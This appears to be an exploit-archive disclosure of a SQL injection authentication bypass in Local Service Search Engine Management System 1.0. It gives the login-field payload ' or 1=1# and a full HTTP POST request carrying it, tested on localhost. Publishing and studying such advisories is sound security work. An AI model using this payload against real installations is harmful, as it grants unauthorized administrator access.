Local Service Search Engine Management System 1.0 SQL Injection

Local Service Search Engine Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | 873806f84867ac817a077cd41f7f195e

# Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
# Date: 21/11/2020
# Exploit Author: Aditya Wakhlu
# Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

Step 1: Open the URL http://localhost:8080/lssems/admin/login.php
Step 2: use payload Aditya' or 1=1# in user and password field

Malicious Request:::

POST /lssems/admin/ajax.php?action=login HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/lssems/admin/login.php
Cookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3

username=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23

Related Posts